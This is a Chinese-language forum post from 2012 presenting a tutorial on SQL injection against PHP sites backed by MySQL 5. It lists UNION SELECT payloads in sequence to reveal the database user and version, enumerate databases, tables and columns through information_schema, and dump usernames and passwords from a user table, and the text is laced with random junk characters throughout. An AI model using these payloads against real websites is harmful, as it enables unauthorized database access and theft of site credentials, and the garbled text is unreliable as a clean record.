& `& M: R( [# f9 C: j教程内容:Mysql 5+php 注入
2 M" P. U$ z$ e/ t* Z' R1 H' W& w, k% T5 N3 o8 L( W
* D/ L: X' c3 m% i% a U* r! Z
7 U9 }: S* s! H- U/ X
一.查看MYSQL基本信息(库名,版本,用户), Z: c, T; ]* C
1 T: b @" ^3 V
and 1=2 union select 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8/*- O( C* R& W2 d1 X6 p/ u
7 f- p/ h G9 |% E- m4 m( l二.查数据库% u* Q5 H4 F4 n: f( _, p2 [
+ c4 p# P1 t, Z4 _* v2 ?: M! o; g
and 1=2 union select 1,SCHEMA_NAME,3,4,5,6,7,8 from information_schema.SCHEMATA limit 1,1/*
) u; K; L2 {& m# m# I, e& }limit 从0开始递增,查询到3时浏览器返回错误,说明存在2个库。8 k9 {6 c% E" v: }$ J
0 ^) T, P. f/ P6 t* u1 M
三.暴表) c3 k1 ?" a+ r2 f% j' t) K) V9 F4 S
9 y, M) ]9 L; c# M
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8 from information_schema.TABLES where TABLE_SCHEMA =库的16进制编码 limit 1,1/*
$ K5 R. y6 d" S+ y! ^: Y% ^" d D2 b
limit 从0开始递增,查询到14时浏览器返回错误,说明此库存在13个表。! F% @; u6 C% O) G" A/ `/ ]8 O
\* y! N/ F) e2 g9 K: @" y四.暴字段5 A; `& U, c7 [. T1 \- S y; b
1 c- T/ Y @% ^, }
and 1=2 union select 1,2,3,COLUMN_NAME,4,5,6,7,8from information_schema.COLUMNS where TABLE_NAME=表的16进制编码 limit 1,1/*
. I: o. k) m, X' c$ S( Z4 H5 O- M5 @3 n4 j
limit 从0开始递增,查询到时浏览器返回错误,说明此表存在N-1个列。6 L. x t6 [ C5 X
6 ]( k* R- C- Z, }: {8 h
五.暴数据3 _) @0 Y4 O8 M, a
3 S8 a. F7 A9 u0 q5 o% K# p0 Rand 1=2 union select 1,2,3,name,5,password,7,8 from web.ad_user/*1 ~: s. _" E0 A1 k
4 v: I/ Z/ m# W) Z9 T, v3 ^3 }
$ k2 s @$ L% I, i5 V) |* q9 N这里直接暴明文的密码,大多时候我们遇到的是MD5加密之后的密文。 }. B, K1 m) F6 Y
|
发表于 2012-9-13 16:27:53
收藏
支持
反对